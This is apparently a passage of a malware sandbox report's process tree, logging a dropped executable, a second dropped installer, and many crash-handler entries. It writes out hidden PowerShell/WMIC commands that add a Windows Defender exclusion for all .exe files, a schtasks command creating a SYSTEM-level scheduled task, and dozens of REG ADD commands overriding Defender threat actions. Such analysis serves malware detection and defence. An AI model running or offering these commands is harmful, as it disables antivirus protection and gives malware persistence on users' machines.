C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:7080 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:7144 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:7124 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:5760 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:796 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3752 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
PID:944 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1208 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
PID:5516 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1832 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
PID:4604 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4068 --field-trial-handle=2860,i,2291932801383301685,3688407703392993180,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
PID:6564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21884⤵
- Program crash
PID:5776 -
C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exeC:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:5860 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:5448
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:3452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5736 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5836 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe\" z0 /SRdidV 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 6765⤵
- Program crash
PID:5096 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21004⤵
- Program crash
PID:5936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21244⤵
- Program crash
PID:6088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21004⤵
- Program crash
PID:6136 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21764⤵
- Program crash
PID:3516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21204⤵
- Program crash
PID:5264 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18324⤵
- Program crash
PID:400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21444⤵
- Program crash
PID:4820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 22364⤵
- Program crash
PID:5484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 17964⤵
- Program crash
PID:5524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21204⤵
- Program crash
PID:5712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 22204⤵
- Program crash
PID:5820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21204⤵
- Program crash
PID:5320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 20804⤵
- Program crash
PID:408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 17124⤵
- Program crash
PID:1904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18724⤵
- Program crash
PID:5300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 16604⤵
- Program crash
PID:5124 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 21284⤵
- Program crash
PID:960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18444⤵
- Program crash
PID:3636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 15804⤵
- Program crash
PID:3788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 13124⤵
- Program crash
PID:6336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 10844⤵PID:6604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 16484⤵PID:6500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 17004⤵PID:780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 12244⤵PID:2792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 18444⤵PID:5156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2768 -ip 27681⤵PID:2164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2768 -ip 27681⤵PID:2136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 27681⤵PID:4664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 27681⤵PID:4156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2768 -ip 27681⤵PID:3296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2768 -ip 27681⤵PID:1020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 27681⤵PID:2452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2768 -ip 27681⤵PID:2872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2768 -ip 27681⤵PID:2520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 27681⤵PID:240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 27681⤵PID:796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2768 -ip 27681⤵PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 27681⤵PID:4784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2768 -ip 27681⤵PID:400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2768 -ip 27681⤵PID:2280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 27681⤵PID:3388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2768 -ip 27681⤵PID:2160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2768 -ip 27681⤵PID:3164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2768 -ip 27681⤵PID:2520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 27681⤵PID:240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 27681⤵PID:1516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 27681⤵PID:4680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 27681⤵PID:4820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 27681⤵PID:1648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 27681⤵PID:2164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2768 -ip 27681⤵PID:2716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 27681⤵PID:4284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 27681⤵PID:1536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 27681⤵PID:4780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2768 -ip 27681⤵PID:1912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 27681⤵PID:2456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2768 -ip 27681⤵PID:5000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 27681⤵PID:1716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 27681⤵PID:4984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2768 -ip 27681⤵PID:5108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2768 -ip 27681⤵PID:3060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 27681⤵PID:2372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2768 -ip 27681⤵PID:4680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 27681⤵PID:2164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 27681⤵PID:5412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 27681⤵PID:5736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2768 -ip 27681⤵PID:5836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 27681⤵PID:6072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 27681⤵PID:6120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 27681⤵PID:5136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 27681⤵PID:5108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 27681⤵PID:2276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 27681⤵PID:4780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 27681⤵PID:2716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 27681⤵PID:5528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2768 -ip 27681⤵PID:5660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 27681⤵PID:5812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2768 -ip 27681⤵PID:5300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2768 -ip 27681⤵PID:6120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 27681⤵PID:5340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2768 -ip 27681⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exeC:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe z0 /SRdidV 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6020
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4644
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5464
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5672
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5716
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5808
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5664
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5616
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1020
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5820
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5204
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5512
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5852
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5952
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5724
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3732
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4552
-
